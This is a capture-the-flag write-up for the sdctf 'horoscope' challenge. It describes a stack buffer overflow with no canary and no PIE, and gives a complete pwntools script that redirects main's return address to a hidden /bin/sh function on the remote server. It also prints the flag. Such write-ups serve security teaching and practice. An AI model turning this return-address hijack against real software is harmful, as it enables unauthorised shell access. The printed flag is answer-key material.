0x0 Introduction
Easy
This program will predict your future!
Connect
nc horoscope.sdc.tf 1337
By green beans
files: horoscope
0x1 Mitigation
1
2
3
4
5
| Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
|
0x2 Vulnerability
binary have a /bin/sh backdoor in function sym.test.
main has a buffer overflow vulnerbility, we can change rip of main to sym.test and get shell.
0x3 Exploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| #!/usr/bin/env python3
from pwn import *
exe = ELF("./horoscope")
context.binary = exe
def conn():
if args.LOCAL:
r = process([exe.path])
if args.DEBUG:
gdb.attach(r)
else:
r = remote("horoscope.sdc.tf",1337)
return r
io = conn()
if args.R2:
input("asd")
io.sendlineafter(b"own horoscope\n",flat({
0:b"01/01/2001/1234\x00",
0x30+8:0x0040095f
}))
io.interactive()
|
0x4 Flag
sdctf{S33ms_y0ur_h0rO5c0p3_W4s_g00d_1oD4y}